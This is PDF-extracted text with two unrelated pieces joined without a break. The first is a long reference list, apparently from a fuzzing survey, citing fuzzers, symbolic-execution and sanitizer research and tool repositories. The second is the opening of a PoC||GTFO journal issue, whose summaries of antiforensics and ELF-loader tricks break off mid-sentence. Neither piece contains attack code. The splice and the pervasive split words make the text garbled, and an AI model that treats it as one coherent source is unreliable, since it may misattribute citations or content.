Software Engineering , 2016, pp. 820–831.
[66] W. Cui, M. Peinado, K. Chen, H. J. Wang, and L. Irun-Briz,
“Tupni: Automatic reverse engineering of input formats,” i n
Proceedings of the ACM Conference on Computer and
Communications Security , 2008, pp. 391–402.
[67] L. Della Toffola, C. A. Staicu, and M. Pradel, “Saying ‘hi! ’ is not
enough: Mining inputs for effective test generation,” in
Proceedings of the International Conference on Automated S oftware
Engineering , 2017, pp. 44–49.
[68] J. D. DeMott, R. J. Enbody, and W. F. Punch, “Revolutioni zing
the field of grey-box attack surface testing with evolutiona ry
fuzzing,” in Proceedings of the Black Hat USA , 2007.
[69] K. Dewey, J. Roesch, and B. Hardekopf, “Language fuzzin g
using constraint logic programming,” in Proceedings of the
International Conference on Automated Software Engineeri ng, 2014,
pp. 725–730.
[70] ——, “Fuzzing the rust typechecker using clp,” in Proceedings of
the International Conference on Automated Software Engine ering ,
2015, pp. 482–493.
[71] W. Dietz, P . Li, J. Regehr, and V . Adve, “Understanding i nteger
overflow in C/C++,” in Proceedings of the International Conference
on Software Engineering , 2012, pp. 760–770.
[72] B. Dolan-Gavitt, A. Srivastava, P . Traynor, and J. Giffin , “Robust
signatures for kernel data structures,” in Proceedings of the ACM
Conference on Computer and Communications Security , 2009, pp.
566–577.
[73] A. Doup ́ e, L. Cavedon, C. Kruegel, and G. Vigna, “Enemy o f the
State: A state-aware black-box web vulnerability scanner,” in
Proceedings of the USENIX Security Symposium , 2012, pp. 523–538.
[74] F. Duchene, S. Rawat, J.-L. Richier, and R. Groz, “Kamele onfuzz:
Evolutionary fuzzing for black-box XSS detection,” in
Proceedings of the ACM Conference on Data and Application Se curity
and Privacy , 2014, pp. 37–48.
[75] D. Duran, D. Weston, and M. Miller, “Targeted taint driv en
fuzzing using software metrics,” in Proceedings of the CanSecWest ,
2011.
[76] M. Eddington, “Peach fuzzing platform,”
http://community.peachfuzzer.com/WhatIsPeach.html.
[77] A. Edwards, A. Srivastava, and H. Vo, “Vulcan: Binary
transformation in a distributed environment,” Microsoft
Research, Tech. Rep. MSR-TR-2001-50, 2001.
[78] S. Embleton, S. Sparks, and R. Cunningham, ““sidewinder”: An
evolutionary guidance system for malicious input crafting ,” in
Proceedings of the Black Hat USA , 2006.
[79] G. Evron, N. Rathaus, R. Fly, A. Jenik, D. Maynor, C. Mill er, and
Y. Naveh, Open Source Fuzzing Tools . Syngress, 2007.
[80] A. P . Felt, E. Chin, S. Hanna, D. Song, and D. Wagner, “Andro id
permissions demystified,” in Proceedings of the ACM Conference
on Computer and Communications Security , 2011, pp. 627–638.
[81] S. Fewer, “A collection of burpsuite intruder payloads, fuzz lists
and file uploads,” https://github.com/1N3/IntruderPaylo ads.
18
[82] J. Foote, “Gdb exploitable,”
https://github.com/jfoote/exploitable.
[83] S. Gan, C. Zhang, X. Qin, X. Tu, K. Li, Z. Pei, and Z. Chen,
“CollAFL: Path sensitive fuzzing,” in Proceedings of the IEEE
Symposium on Security and Privacy , 2018, pp. 660–677.
[84] V . Ganesh, T. Leek, and M. Rinard, “Taint-based directe d
whitebox fuzzing,” in Proceedings of the International Conference
on Software Engineering , 2009, pp. 474–484.
[85] H. Gascon, C. Wressnegger, F. Yamaguchi, D. Arp, and K. R ieck,
“PULSAR: Stateful black-box fuzzing of proprietary network
protocols,” in Proceedings of the International Conference on
Security and Privacy in Communication Systems , 2015, pp. 330–347.
[86] GitHub, “Public fuzzers,”
https://github.com/search?q=fuzzing&type=Repositori es.
[87] P . Godefroid, “Random testing for security: Blackbox v s.
whitebox fuzzing,” in Proceedings of the International Workshop on
Random Testing , 2007, pp. 1–1.
[88] P . Godefroid, A. Kiezun, and M. Y. Levin, “Grammar-base d
whitebox fuzzing,” in Proceedings of the ACM Conference on
Programming Language Design and Implementation , 2008, pp.
206–215.
[89] P . Godefroid, N. Klarlund, and K. Sen, “DART: Directed
automated random testing,” in Proceedings of the ACM Conference
on Programming Language Design and Implementation , 2005, pp.
213–223.
[90] P . Godefroid, M. Y. Levin, and D. A. Molnar, “Automated
whitebox fuzz testing,” in Proceedings of the Network and
Distributed System Security Symposium , 2008, pp. 151–166.
[91] P . Godefroid, H. Peleg, and R. Singh, “Learn&Fuzz: Machi ne
learning for input fuzzing,” in Proceedings of the International
Conference on Automated Software Engineering , 2017, pp. 50–59.
[92] P . Goodman and A. Dinaburg, “The past, present, and futu re of
cyberdyne,” in Proceedings of the IEEE Symposium on Security and
Privacy , 2018, pp. 61–69.
[93] GrammaTech, “Grammatech blogs: The cyber grand challe nge,”
http://blogs.grammatech.com/the-cyber-grand-challen ge.
[94] G. Grieco, M. Ceresa, and P . Buiras, “Quickfuzz: An auto matic
random fuzzer for common file formats,” in Proceedings of the 9th
International Symposium on Haskell , 2016, pp. 13–20.
[95] A. H. H, “Melkor elffuzzer,”
https://github.com/IOActive/Melkor ELF Fuzzer.
[96] I. Haller, Y. Jeon, H. Peng, M. Payer, C. Giuffrida, H. Bo s, and
E. Van Der Kouwe, “TypeSan: Practical type confusion
detection,” in Proceedings of the ACM Conference on Computer and
Communications Security , 2016, pp. 517–528.
[97] I. Haller, A. Slowinska, M. Neugschwandtner, and H. Bos,
“Dowsing for overflows: A guided fuzzer to find buffer
boundary violations,” in Proceedings of the USENIX Security
Symposium , 2013, pp. 49–64.
[98] D. Hamlet, “When only random testing will do,” in Proceedings
of the International Workshop on Random Testing , 2006, pp. 1–9.
[99] H. Han and S. K. Cha, “IMF: Inferred model-based fuzzer,” in
Proceedings of the ACM Conference on Computer and
Communications Security , 2017, pp. 2345–2358.
[100] H. Han, D. Oh, and S. K. Cha, “CodeAlchemist:
Semantics-aware code generation to find vulnerabilities in
javascript engines,” in Proceedings of the Network and Distributed
System Security Symposium , 2019.
[101] W. Han, B. Joe, B. Lee, C. Song, and I. Shin, “Enhancing mem ory
error detection for large-scale applications and fuzz test ing,” in
Proceedings of the Network and Distributed System Security
Symposium , 2018.
[102] A. Helin, “radamsa,” https://github.com/aoh/radam sa.
[103] S. Hocevar, “zzuf,” https://github.com/samhocevar/ zzuf.
[104] G. Hoglund, “Runtime decompilation,” in Proceedings of the Black
Hat USA , 2003.
[105] C. Holler, K. Herzig, and A. Zeller, “Fuzzing with code
fragments,” in Proceedings of the USENIX Security Symposium ,
2012, pp. 445–458.
[106] A. D. Householder, “Well there’s your problem: Isolat ing the
crash-inducing bits in a fuzzed file,” CERT, Tech. Rep.
CMU/SEI-2012-TN-018, 2012.
[107] A. D. Householder and J. M. Foote, “Probability-based
parameter selection for black-box fuzz testing,” CERT, Tec h. Rep.
CMU/SEI-2012-TN-019, 2012.[108] W. E. Howden, “Methodology for the generation of progr am test
data,” IEEE Transactions on Computers , vol. C, no. 5, pp. 554–560,
1975.
[109] InfoSec Institute, “Charlie Miller reveals his proces s for security
research,”
http://resources.infosecinstitute.com/how-charlie-m iller-does-research/,
2011.
[110] V . Iozzo, “0-knowledge fuzzing,” in Proceedings of the Black Hat
USA , 2010.
[111] S. Jana and V . Shmatikov, “Abusing file processing in malw are
detectors for fun and profit,” in Proceedings of the IEEE
Symposium on Security and Privacy , 2012, pp. 80–94.
[112] K. Jayaraman, D. Harvison, V . Ganesh, and A. Kiezun, “j Fuzz: A
concolic whitebox fuzzer for java,” in Proceedings of the First
NASA Forma Methods Symposium , 2009, pp. 121–125.
[113] Y. Jeon, P . Biswas, S. Carr, B. Lee, and M. Payer, “HexTyp e:
Efficient detection of type confusion errors for c++,” in
Proceedings of the ACM Conference on Computer and
Communications Security , 2017, pp. 2373–2387.
[114] W. Johansson, M. Svensson, U. E. Larson, M. Almgren, and
V . Gulisano, “T-Fuzz: Model-based fuzzing for robustness
testing of telecommunication protocols,” in Proceedings of the
IEEE International Conference on Software Testing, Verific ation and
Validation , 2014, pp. 323–332.
[115] D. Jones, “Trinity,” https://github.com/kernelsla cker/trinity.
[116] P . Joshi, C.-S. Park, K. Sen, and M. Naik, “A randomized
dynamic program analysis technique for detecting real
deadlocks,” in Proceedings of the ACM Conference on Programming
Language Design and Implementation , 2009, pp. 110–120.
[117] R. L. S. Jr., “A framework for file format fuzzing with gen etic
algorithms,” Ph.D. dissertation, University of Tennessee , 2012.
[118] J. Jung, A. Sheth, B. Greenstein, D. Wetherall, G. Magan is, and
T. Kohno, “Privacy oracle: A system for finding application
leaks with black box differential testing,” in Proceedings of the
ACM Conference on Computer and Communications Security , 2008,
pp. 279–288.
[119] M. Jurczyk, “CompareCoverage,”
https://github.com/googleprojectzero/CompareCoverag e.
[120] R. Kaksonen, M. Laakso, and A. Takanen, “Software secur ity
assessment through specification mutations and fault injec tion,”
inProceedings of the IFIP TC 6/TC 11 International Conference on
Communications and Multimedia Security , 2001, pp. 173–183.
[121] A. Kanade, R. Alur, S. Rajamani, and G. Ramanlingam,
“Representation dependence testing using program inversi on,”
inProceedings of the International Symposium on Foundations of
Software Engineering , 2010, pp. 277–286.
[122] A. Kapravelos, C. Grier, N. Chachra, C. Kruegel, G. Vig na, and
V . Paxson, “Hulk: Eliciting malicious behavior in browser
extensions,” in Proceedings of the USENIX Security Symposium ,
2014, pp. 641–654.
[123] U. Karg ́ en and N. Shahmehri, “Turning programs against each
other: High coverage fuzz-testing using binary-code mutat ion
and dynamic slicing,” in Proceedings of the International
Symposium on Foundations of Software Engineering , 2015, pp.
782–792.
[124] H. Kario, “tlsfuzzer,” https://github.com/tomato4 2/tlsfuzzer.
[125] S. Y. Kim, S. Lee, I. Yun, W. Xu, B. Lee, Y. Yun, and T. Kim,
“CAB-Fuzz: Practical concolic testing techniques for COTS
operating systems,” in Proceedings of the USENIX Annual
Technical Conference , 2017, pp. 689–701.
[126] J. C. King, “Symbolic execution and program testing,”
Communications of the ACM , vol. 19, no. 7, pp. 385–394, 1976.
[127] G. Klees, A. Ruef, B. Cooper, S. Wei, and M. Hicks, “Evalu ating
fuzz testing,” in Proceedings of the ACM Conference on Computer
and Communications Security , 2018, pp. 2123–2138.
[128] P . Koopman, J. Sung, C. Dingman, D. Siewiorek, and T. Marz ,
“Comparing operating systems using robustness benchmarks ,”
inProceedings of the Symposium on Reliable Distributed Syste ms,
1997, pp. 72–79.
[129] J. Koret, “Nightmare,”
https://github.com/joxeankoret/nightmare.
[130] lafintel, “Circumventing fuzzing roadblocks with com piler
transformations,”
https://lafintel.wordpress.com/2016/08/15/circumvent ing-fuzzing-roadblocks-with-compiler-transformation s/,
2016.
[131] Z. Lai, S. Cheung, and W. Chan, “Detecting atomic-set
serializability violations in multithreaded programs thr ough
19
active randomized testing,” in Proceedings of the International
Conference on Software Engineering , 2010, pp. 235–244.
[132] M. Laurenzano, M. M. Tikir, L. Carrington, and A. Snavel y,
“PEBIL: Efficient static binary instrumentation for linux, ” in
Proceedings of the IEEE International Symposium on Perform ance
Analysis of Systems & Software , 2010, pp. 175–183.
[133] B. Lee, C. Song, T. Kim, and W. Lee, “Type casting verifica tion:
Stopping an emerging attack vector,” in Proceedings of the
USENIX Security Symposium , 2015, pp. 81–96.
[134] S. Lee, C. Yoon, C. Lee, S. Shin, V . Yegneswaran, and P . Porr as,
“DELTA: A security assessment framework for software-defin ed
networks,” in Proceedings of the Network and Distributed System
Security Symposium , 2017.
[135] C. Lemieux, R. Padhye, K. Sen, and D. Song, “PerfFuzz:
Automatically generating pathological inputs,” in Proceedings of
the International Symposium on Software Testing and Analys is, 2018,
pp. 254–265.
[136] C. Lemieux and K. Sen, “FairFuzz: A targeted mutation st rategy
for increasing greybox fuzz testing coverage,” in Proceedings of
the International Conference on Automated Software Engine ering ,
2018, pp. 475–485.
[137] J. Li, B. Zhao, and C. Zhang, “Fuzzing: a survey,” Cybersecurity ,
vol. 1, no. 1, 2018.
[138] Y. Li, B. Chen, M. Chandramohan, S.-W. Lin, Y. Liu, and A. Tiu,
“Steelix: Program-state based binary fuzzing,” in Proceedings of
the International Symposium on Foundations of Software Eng ineering ,
2017, pp. 627–637.
[139] H. Liang, X. Pei, X. Jia, W. Shen, and J. Zhang, “Fuzzing: State of
the art,” IEEE Transactions on Reliability , vol. 67, no. 3, pp.
1199–1218, 2018.
[140] C. Lidbury, A. Lascu, N. Chong, and A. F. Donaldson,
“Many-core compiler fuzzing,” in Proceedings of the ACM
Conference on Programming Language Design and Implementat ion,
2015, pp. 65–76.
[141] Z. Lin and X. Zhang, “Deriving input syntactic structu re from
execution,” in Proceedings of the International Symposium on
Foundations of Software Engineering , 2008, pp. 83–93.
[142] P . Liu, X. Zhang, M. Pistoia, Y. Zheng, M. Marques, and L . Zeng,
“Automatic text input generation for mobile testing,” in
Proceedings of the International Conference on Software En gineering ,
2017, pp. 643–653.
[143] LMH, S. Grubb, I. van Sprundel, E. Sandeen, and J. Wilson,
“fsfuzzer,”
http://people.redhat.com/sgrubb/files/fsfuzzer-0.7.t ar.gz.
[144] C.-K. Luk, R. Cohn, R. Muth, H. Patil, A. Klauser, G. Low ney,
S. Wallace, V . J. Reddi, and K. Hazelwood, “Pin: Building
customized program analysis tools with dynamic
instrumentation,” in Proceedings of the ACM Conference on
Programming Language Design and Implementation , 2005, pp.
190–200.
[145] L. Ma, C. Artho, C. Zhang, H. Sato, J. Gmeiner, and R. Raml er,
“GRT: Program-analysis-guided random testing,” in Proceedings
of the International Conference on Automated Software Engi neering ,
2015, pp. 212–223.
[146] R. Mahmood, N. Esfahani, T. Kacem, N. Mirzaei, S. Malek, and
A. Stavrou, “A whitebox approach for automated security
testing of android applications on the cloud,” in Proceedings of
the International Workshop on Automation of Software Test , 2012, pp.
22–28.
[147] L. Martignoni, S. McCamant, P . Poosankam, D. Song, and
P . Maniatis, “Path-exploration lifting: Hi-fi tests for lo- fi
emulators,” in Proceedings of the International Conference on
Architectural Support for Programming Languages and Opera ting
Systems , 2012, pp. 337–348.
[148] W. M. McKeeman, “Differential testing for software,” Digital
Technical Journal , vol. 10, no. 1, pp. 100–107, 1998.
[149] D. Mckinney, “antiparser,” http://antiparser.sour ceforge.net/.
[150] Microsoft Corporation, “!exploitable crash analyze r – MSEC
debugger extensions,” https://msecdbg.codeplex.com.
[151] ——, “Minifuzz,”
https://msdn.microsoft.com/en-us/biztalk/gg675011.
[152] B. P . Miller, L. Fredriksen, and B. So, “An empirical stu dy of the
reliability of UNIX utilities,” Communications of the ACM , vol. 33,
no. 12, pp. 32–44, 1990.
[153] C. Miller, “Fuzz by number: More data about fuzzing tha n you
ever wanted to know,” in Proceedings of the CanSecWest , 2008.[154] D. Molnar, X. C. Li, and D. A. Wagner, “Dynamic test gene ration
to find integer bugs in x86 binary linux programs,” in
Proceedings of the USENIX Security Symposium , 2009, pp. 67–82.
[155] L. D. Moura and N. Bjørner, “Satisfiability modulo theor ies:
Introduction and applications,” Communications of the ACM ,
vol. 54, no. 9, pp. 69–77, 2011.
[156] C. Mulliner, N. Golde, and J.-P . Seifert, “SMS of death: f rom
analyzing to attacking mobile phones on a large scale,” in
Proceedings of the USENIX Security Symposium , 2011, pp. 24–24.
[157] MWR Labs, “KernelFuzzer,”
https://github.com/mwrlabs/KernelFuzzer.
[158] G. J. Myers, C. Sandler, and T. Badgett, The Art of Software
Testing . Wiley, 2011.
[159] S. Nagarakatte, J. Zhao, M. M. K. Martin, and S. Zdancewic ,
“SoftBound: Highly compatible and complete spatial memory
safety for C,” in Proceedings of the ACM Conference on
Programming Language Design and Implementation , 2009, pp.
245–258.
[160] ——, “CETS: Compiler enforced temporal safety for C,” in
Proceedings of the International Symposium on Memory Manag ement ,
2010, pp. 31–40.
[161] NCC Group, “Hodor fuzzer,”
https://github.com/nccgroup/hodor.
[162] ——, “Triforce linux syscall fuzzer,”
https://github.com/nccgroup/TriforceLinuxSyscallFuzz er.
[163] N. Nethercote and J. Seward, “Valgrind: a framework for
heavyweight dynamic binary instrumentation,” in Proceedings of
the ACM Conference on Programming Language Design and
Implementation , 2007, pp. 89–100.
[164] J. Newsome and D. Song, “Dynamic taint analysis for auto matic
detection, analysis, and signature generation of exploits on
commodity software,” in Proceedings of the Network and
Distributed System Security Symposium , 2005.
[165] D. Oleksiuk, “Ioctl fuzzer,”
https://github.com/Cr4sh/ioctlfuzzer, 2009.
[166] C. Pacheco, S. K. Lahiri, M. D. Ernst, and T. Ball,
“Feedback-directed random test generation,” in Proceedings of the
International Conference on Software Engineering , 2007, pp. 75–84.
[167] S. Pailoor, A. Aday, and S. Jana, “MoonShine: Optimizing O S
fuzzer seed selection with trace distillation,” in Proceedings of the
USENIX Security Symposium , 2018, pp. 729–743.
[168] J. Pan, G. Yan, and X. Fan, “Digtool: A virtualization- based
framework for detecting kernel vulnerabilities,” in Proceedings of
the USENIX Security Symposium , 2017, pp. 149–165.
[169] C.-S. Park and K. Sen, “Randomized active atomicity viol ation
detection in concurrent programs,” in Proceedings of the
International Symposium on Foundations of Software Engine ering ,
2008, pp. 135–145.
[170] H. Peng, Y. Shoshitaishvili, and M. Payer, “T-Fuzz: Fuz zing by
program transformation,” in Proceedings of the IEEE Symposium
on Security and Privacy , 2018, pp. 917–930.
[171] T. Petsios, A. Tang, S. J. Stolfo, A. D. Keromytis, and S. Ja na,
“NEZHA: Efficient domain-independent differential testin g,” in
Proceedings of the IEEE Symposium on Security and Privacy , 2017,
pp. 615–632.
[172] V .-T. Pham, M. B ̈ ohme, and A. Roychoudhury, “Model-ba sed
whitebox fuzzing for program binaries,” in Proceedings of the
International Conference on Automated Software Engineeri ng, 2016,
pp. 543–553.
[173] P . Project, “DynInst: Putting the performance in high
performance computing,” http://www.dyninst.org/.
[174] H. Raffelt, B. Steffen, and T. Berg, “LearnLib: A librar y for
automata learning and experimentation,” in Proceedings of the
International Workshop on Formal Methods for Industrial Cr itical
Systems , 2005, pp. 62–71.
[175] S. Rasthofer, S. Arzt, S. Triller, and M. Pradel, “Making m alory
behave maliciously: Targeted fuzzing of android execution
environments,” in Proceedings of the International Conference on
Software Engineering , 2017, pp. 300–311.
[176] S. Rawat, V . Jain, A. Kumar, L. Cojocar, C. Giuffrida, an d H. Bos,
“VUzzer: Application-aware evolutionary fuzzing,” in
Proceedings of the Network and Distributed System Security
Symposium , 2017.
[177] A. Rebert, S. K. Cha, T. Avgerinos, J. Foote, D. Warren, G . Grieco,
and D. Brumley, “Optimizing seed selection for fuzzing,” in
Proceedings of the USENIX Security Symposium , 2014, pp. 861–875.
20
[178] J. Regehr, Y. Chen, P . Cuoq, E. Eide, C. Ellison, , and X. Yang,
“Test-case reduction for C compiler bugs,” in Proceedings of the
ACM Conference on Programming Language Design and
Implementation , 2012, pp. 335–346.
[179] J. Ruderman, “Lithium,”
https://github.com/MozillaSecurity/lithium/.
[180] J. D. Ruiter and E. Poll, “Protocol state fuzzing of tls
implementations,” in Proceedings of the USENIX Security
Symposium , 2015, pp. 193–206.
[181] M. Samak, M. K. Ramanathan, and S. Jagannathan,
“Synthesizing racy tests,” in Proceedings of the ACM Conference on
Programming Language Design and Implementation , 2015, pp.
175–185.
[182] P . Saxena, S. Hanna, P . Poosankam, and D. Song, “FLAX:
Systematic discovery of client-side validation vulnerabil ities in
rich web applications,” in Proceedings of the Network and
Distributed System Security Symposium , 2010.
[183] F. B. Schneider, “Enforceable security policies,” ACM Transactions
on Information System Security , vol. 3, no. 1, pp. 30–50, 2000.
[184] S. Schumilo, C. Aschermann, R. Gawlik, S. Schinzel, and T. H olz,
“kAFL: Hardware-assisted feedback fuzzing for os kernels, ” in
Proceedings of the USENIX Security Symposium , 2017, pp. 167–182.
[185] E. J. Schwartz, T. Avgerinos, and D. Brumley, “All you ev er
wanted to know about dynamic taint analysis and forward
symbolic execution (but might have been afraid to ask),” in
Proceedings of the IEEE Symposium on Security and Privacy , 2010,
pp. 317–331.
[186] M. Schwarz, D. Gruss, M. Lipp, C. Maurice, T. Schuster, A. Fogh,
and S. Mangard, “Automated detection, exploitation, and
elimination of double-fetch bugs using modern CPU features ,”
inProceedings of the ACM Symposium on Information, Computer
and Communications Security , 2018, pp. 587–600.
[187] M. Security, “funfuzz,”
https://github.com/MozillaSecurity/funfuzz.
[188] ——, “orangfuzz,”
https://github.com/MozillaSecurity/orangfuzz.
[189] K. Sen, “Effective random testing of concurrent progra ms,” in
Proceedings of the International Conference on Automated S oftware
Engineering , 2007, pp. 323–332.
[190] ——, “Race directed random testing of concurrent progr ams,” in
Proceedings of the ACM Conference on Programming Language
Design and Implementation , 2008, pp. 11–21.
[191] K. Sen, D. Marinov, and G. Agha, “CUTE: A concolic unit te sting
engine for C,” in Proceedings of the International Symposium on
Foundations of Software Engineering , 2005, pp. 263–272.
[192] K. Serebryany, D. Bruening, A. Potapenko, and D. Vyukov ,
“AddressSanitizer: A fast address sanity checker,” in Proceedings
of the USENIX Annual Technical Conference , 2012, pp. 309–318.
[193] K. Serebryany and T. Iskhodzhanov, “ThreadSanitizer: d ata race
detection in practice,” in Proceedings of the Workshop on Binary
Instrumentation and Applications , 2009, pp. 62–71.
[194] Z. Sialveras and N. Naziridis, “Introducing Choronzon : An
approach at knowledge-based evolutionary fuzzing,” in
Proceedings of the ZeroNights , 2015.
[195] J. Somorovsky, “Systematic fuzzing and testing of tls li braries,”
inProceedings of the ACM Conference on Computer and
Communications Security , 2016, pp. 1492–1504.
[196] D. Song, F. Hetzelt, D. Das, C. Spensky, Y. Na, S. Volckaert ,
G. Vigna, C. Kruegel, J.-P . Seifert, and M. Franz, “Periscope : An
effective probing and fuzzing framework for the hardware-o s
boundary,” in Proceedings of the Network and Distributed System
Security Symposium , 2019.
[197] W. Song, X. Qian, and J. Huang, “EHBDroid: Beyond GUI
testing for android applications,” in Proceedings of the
International Conference on Automated Software Engineeri ng, 2017,
pp. 27–37.
[198] C. Spensky and H. Hu, “Ll-fuzzer,”
https://github.com/mit-ll/LL-Fuzzer.
[199] E. Stepanov and K. Serebryany, “MemorySanitizer: fast de tector
of uninitialized memory use in C++,” in Proceedings of the
International Symposium on Code Generation and Optimizati on,
2015, pp. 46–55.
[200] N. Stephens, J. Grosen, C. Salls, A. Dutcher, R. Wang, J. C orbetta,
Y. Shoshitaishvili, C. Kruegel, and G. Vigna, “Driller:
Augmenting fuzzing through selective symbolic execution, ” in
Proceedings of the Network and Distributed System Security
Symposium , 2016.[201] M. Sutton, “Filefuzz,”
http://osdir.com/ml/security.securiteam/2005-09/msg 00007.html.
[202] M. Sutton and A. Greene, “The art of file format fuzzing,” in
Proceedings of the Black Hat Asia , 2005.
[203] M. Sutton, A. Greene, and P . Amini, Fuzzing: Brute Force
Vulnerability Discovery . Addison-Wesley Professional, 2007.
[204] R. Swiecki and F. Gr ̈ obert, “honggfuzz,”
https://github.com/google/honggfuzz.
[205] A. Takanen, J. D. DeMott, and C. Miller, Fuzzing for Software
Security Testing and Quality Assurance . Artech House, 2008.
[206] A. Takanen, J. D. DeMott, C. Miller, and A. Kettunen, Fuzzing for
Software Security Testing and Quality Assurance , 2nd ed. Artech
House, 2018.
[207] D. Thiel, “Exposing vulnerabilities in media softwar e,” in
Proceedings of the Black Hat EU , 2008.
[208] C. Tice, T. Roeder, P . Collingbourne, S. Checkoway,
U. Erlingsson, L. Lozano, and G. Pike, “Enforcing forward-e dge
control-flow integrity in gcc & llvm,” in Proceedings of the
USENIX Security Symposium , 2014, pp. 941–955.
[209] N. Tillmann and J. De Halleux, “Pex–white box test gene ration
for .NET,” in Proceedings of the International Conference on Tests
and Proofs , 2008, pp. 134–153.
[210] D. Trabish, A. Mattavelli, N. Rinetzky, and C. Cadar, “ Chopped
symbolic execution,” in Proceedings of the International Conference
on Software Engineering , 2018, pp. 350–360.
[211] Trail of Bits, “GRR,” https://github.com/trailofbi ts/grr.
[212] R. Valotta, “Taking browsers fuzzing to the next (dom) level,” in
Proceedings of the DeepSec , 2012.
[213] S. Veggalam, S. Rawat, I. Haller, and H. Bos, “IFuzzer: An
evolutionary interpreter fuzzer using genetic programmin g,” in
Proceedings of the European Symposium on Research in Comput er
Security , 2016, pp. 581–601.
[214] M. Vuagnoux, “Autodaf ́ e: an act of software torture,” in
Proceedings of the Chaos Communication Congress , 2005, pp. 47–58.
[215] D. Vyukov, “go-fuzz,” https://github.com/dvyukov/ go-fuzz.
[216] ——, “syzkaller,” https://github.com/google/syzka ller.
[217] J. Wang, B. Chen, L. Wei, and Y. Liu, “Skyfire: Data-drive n seed
generation for fuzzing,” in Proceedings of the IEEE Symposium on
Security and Privacy , 2017, pp. 579–594.
[218] S. Wang, J. Nam, and L. Tan, “QTEP: Quality-aware test ca se
prioritization,” in Proceedings of the International Symposium on
Foundations of Software Engineering , 2017, pp. 523–534.
[219] T. Wang, T. Wei, G. Gu, and W. Zou, “TaintScope: A
checksum-aware directed fuzzing tool for automatic softwa re
vulnerability detection,” in Proceedings of the IEEE Symposium on
Security and Privacy , 2010, pp. 497–512.
[220] X. Wang, N. Zeldovich, M. F. Kaashoek, and A. Solar-Leza ma,
“Towards optimization-safe systems: Analyzing the impact of
undefined behavior,” in Proceedings of the ACM Symposium on
Operating System Principles , 2013, pp. 260–275.
[221] V . M. Weaver and D. Jones, “perf fuzzer: Targeted fuzzing of the
perf event open() system call,” UMaine VMW Group, Tech.
Rep., 2015.
[222] J. Wei, J. Chen, Y. Feng, K. Ferles, and I. Dillig, “Singu larity:
Pattern fuzzing for worst case complexity,” in Proceedings of the
International Symposium on Foundations of Software Engine ering ,
2018, pp. 213–223.
[223] S. Winter, C. Sˆ arbu, N. Suri, and B. Murphy, “The impact o f fault
models on software robustness evaluations,” in Proceedings of the
International Conference on Software Engineering , 2011, pp. 51–60.
[224] M. Y. Wong and D. Lie, “Intellidroid: A targeted input g enerator
for the dynamic analysis of android malware,” in Proceedings of
the Network and Distributed System Security Symposium , 2016.
[225] M. Woo, S. K. Cha, S. Gottlieb, and D. Brumley, “Scheduling
black-box mutational fuzzing,” in Proceedings of the ACM
Conference on Computer and Communications Security , 2013, pp.
511–522.
[226] T. Xie, N. Tillmann, J. de Halleux, and W. Schulte,
“Fitness-guided path exploration in dynamic symbolic
execution,” in Proceedings of the International Conference on
Dependable Systems Networks , 2009, pp. 359–368.
[227] D. Xu, J. Ming, and D. Wu, “Cryptographic function dete ction in
obfuscated binaries via bit-precise symbolic loop mapping ,” in
Proceedings of the IEEE Symposium on Security and Privacy , 2017,
pp. 921–937.
[228] W. Xu, S. Kashyap, C. Min, and T. Kim, “Designing new
operating primitives to improve fuzzing performance,” in
21
Proceedings of the ACM Conference on Computer and
Communications Security , 2017, pp. 2313–2328.
[229] D. Yang, Y. Zhang, and Q. Liu, “Blendfuzz: A model-base d
framework for fuzz testing programs with grammatical input s,”
inProceedings of the ACM Conference on Programming Language
Design and Implementation , 2012, pp. 1070–1076.
[230] I. Yun, S. Lee, M. Xu, Y. Jang, and T. Kim, “QSYM: A practica l
concolic execution engine tailored for hybrid fuzzing,” in
Proceedings of the USENIX Security Symposium , 2018, pp. 745–762.
[231] M. Zalewski, “American Fuzzy Lop,”
http://lcamtuf.coredump.cx/afl/.
[232] ——, “Crossfuzz,”
https://lcamtuf.blogspot.com/2011/01/announcing-cro ssfuzz-potential-0-day-in.html.
[233] ——, “New in AFL: persistent mode,”
https://lcamtuf.blogspot.com/2015/06/new-in-afl-pers istent-mode.html.
[234] ——, “ref fuzz,”
http://lcamtuf.blogspot.com/2010/06/announcing-reff uzz-2yo-fuzzer.html.
[235] ——, “Technical “whitepaper” for afl-fuzz,”
http://lcamtuf.coredump.cx/afl/technical details.txt.
[236] A. Zeller and R. Hildebrandt, “Simplifying and isolati ng
failure-inducing input,” IEEE Transactions on Software
Engineering , vol. 28, no. 2, pp. 183–200, 2002.[237] K. Zetter, “A famed hacker is grading thousands of
programs—and may revolutionize software in the process,”
https://goo.gl/LRwaVl.
[238] M. Zhang, R. Qiao, N. Hasabnis, and R. Sekar, “A platform for
secure static binary instrumentation,” in Proceedings of the
International Conference on Virtual Execution Environmen ts, 2014,
pp. 129–140.
[239] L. Zhao, Y. Duan, H. Yin, and J. Xuan, “Send hardest probl ems
my way: Probabilistic path prioritization for hybrid fuzzi ng,” in
Proceedings of the Network and Distributed System Security
Symposium , 2019.
[240] M. Zimmermann, “Tavor,” https://github.com/zimmsk i/tavor.International Journal of PoC ∥GTFO
Issue 0x00, a CFP with PoC
An epistle from the desk of Rt. Revd. Pastor Manul Laphroaig
pastor@phrack.org
August 5, 2013
Legal Note: Permission to use all or part of this work for personal, classroom, or whatever other use is NOT
granted unless you make a copy and pass it to a neighbor without fee, excepting libations offered by the aforementioned
neighbor in order to facilitate neighborly hacking, and that said copy bears this notice and the full citation on the first
page. Because if burning a book is a sin—which it surely is!—then copying of a book is your sacred duty. For uses in
outer space where a neighbor to share with cannot be readily found, seek blessing from the Pastor and kindly provide
your orbital ephemerides and radio band so that updates could be beamed to you via the Southern Appalachian
Space Agency (SASA).
1 Call to Worship
Neighbors, please join me in reading this first issue of the International Journal of Proof of Concept or Get
the Fuck Out, a friendly little journal for ladies and gentlemen of distinguished ability and taste in the field
of computer security and the architecture of weird machines.
In Section 2, Travis Goodspeed will show you how to build your own antiforensics hard disk out of an
iPod by simple patching of the open source Rockbox firmware. The result is a USB disk, which still plays
music, but which will also self destruct if forensically imaged.
In Section 3, Julian Bangert and Sergey Bratus provide some nifty tricks for abusing the differences in
ELF dialect between exec() and ld.so. As an example, they produce a file that is both a library and an
executable, to the great confusion of reverse engineers and their totally legitimate IDA Pro licenses.
Section 4 is a sermon on the subjects of Bitcoin, Phrack, and the den on iniquity known as the RSA
Conference, inviting all of you to kill some trees in order to save some source. It brings the joyful news that
we should all shut the fuck up about hat colors and get back to hacking!
Delivering even more nifty ELF research, Bx presents in Section 5 a trick for returning from the ELF
loader into a libc function by abuse of the IFUNC symbol. There’s a catch, though, which is that on amd64
her routine seems to pass a very restricted set of arguments. The first parameter must be zero, the second
